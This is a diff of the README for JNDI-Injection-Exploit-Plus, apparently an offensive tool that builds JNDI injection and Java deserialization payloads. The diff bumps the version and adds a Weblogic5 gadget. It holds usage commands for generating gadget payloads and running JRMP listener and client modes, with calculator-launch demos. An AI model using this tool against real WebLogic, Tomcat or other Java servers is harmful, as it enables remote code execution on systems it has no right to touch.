@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
3535Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
3636Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
3737
38- #### 3. Deserailization Gadget (total: 54 )
38+ #### 3. Deserailization Gadget (total: 55 )
3939
4040P.S. More Gadgets (:arrow_up : ) than ysoserial, welcome to PR more! ^_ ^
4141
@@ -93,6 +93,7 @@ Weblogic1 :arrow_up: |@cckuailong |weblogic:10.3.6.0,
9393Weblogic2 :arrow_up : |@cckuailong |weblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
9494Weblogic3 :arrow_up : |@cckuailong |com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager
9595Weblogic4 :arrow_up : |@cckuailong |weblogic.common.internal.WLObjectOutputStream
96+ Weblogic5 :arrow_up : |@cckuailong |weblogic:12.2.1.4, coherence
9697Wicket1 |@jacob-baines |wicket-util:6.23.0, slf4j-api:1.6.4
9798WildFly1 :arrow_up : |@hugow |org.wildfly:wildfly-connector:26.0.1.Final
9899
@@ -114,15 +115,15 @@ Apereo | Apereo 4.1 Deserialization RCE
114115- Example
115116
116117``` shell
117- $ java -jar JNDI-Injection-Exploit-Plus-1.8 -SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -W Xstream
118+ $ java -jar JNDI-Injection-Exploit-Plus-1.9 -SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -W Xstream
118119```
119120
120121![ ] ( ./img/4.png )
121122
122123#### Web service to return Deserial Gadgets
123124
124125``` shell
125- java -jar JNDI-Injection-Exploit-Plus-1.8 -SNAPSHOT-all.jar
126+ java -jar JNDI-Injection-Exploit-Plus-1.9 -SNAPSHOT-all.jar
126127```
127128
128129``` shell
@@ -142,7 +143,7 @@ P.S. Param wrapper & output is opetional
142143Run as
143144
144145``` shell
145- $ java -jar JNDI-Injection-Exploit-Plus-1.8 -SNAPSHOT-all.jar [-C] [command] [-A] [address]
146+ $ java -jar JNDI-Injection-Exploit-Plus-1.9 -SNAPSHOT-all.jar [-C] [command] [-A] [address]
146147```
147148
148149where:
@@ -172,7 +173,7 @@ Points for attention:
172173Run as
173174
174175``` shell
175- $ java -jar JNDI-Injection-Exploit-Plus-1.8 -SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
176+ $ java -jar JNDI-Injection-Exploit-Plus-1.9 -SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
176177```
177178
178179where:
@@ -190,13 +191,13 @@ where:
190191- JRMPListener
191192
192193``` shell
193- java -cp JNDI-Injection-Exploit-Plus-1.8 -SNAPSHOT-all.jar exploit.JRMPListener < port> CommonsCollections1 calc
194+ java -cp JNDI-Injection-Exploit-Plus-1.9 -SNAPSHOT-all.jar exploit.JRMPListener < port> CommonsCollections1 calc
194195```
195196
196197- JRMPClient
197198
198199``` shell
199- java -jar JNDI-Injection-Exploit-Plus-1.8 -SNAPSHOT-all.jar -C " <ip>:<port>" -D " JRMPClient" -O base64
200+ java -jar JNDI-Injection-Exploit-Plus-1.9 -SNAPSHOT-all.jar -C " <ip>:<port>" -D " JRMPClient" -O base64
200201```
201202
202203## Examples
@@ -208,7 +209,7 @@ Local demo:
2082091 . Start the tool like this:
209210
210211 ``` shell
211- $ java -jar JNDI-Injection-Exploit-Plus-1.8 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -A " 127.0.0.1"
212+ $ java -jar JNDI-Injection-Exploit-Plus-1.9 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -A " 127.0.0.1"
212213 ```
213214
214215 Screenshot:
@@ -239,7 +240,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
239240### Deserialization Payloads
240241
241242``` shell
242- $ java -jar JNDI-Injection-Exploit-Plus-1.8 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -D " Spring2" -O base64
243+ $ java -jar JNDI-Injection-Exploit-Plus-1.9 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -D " Spring2" -O base64
243244```
244245
245246Base64 Output Result:
0 commit comments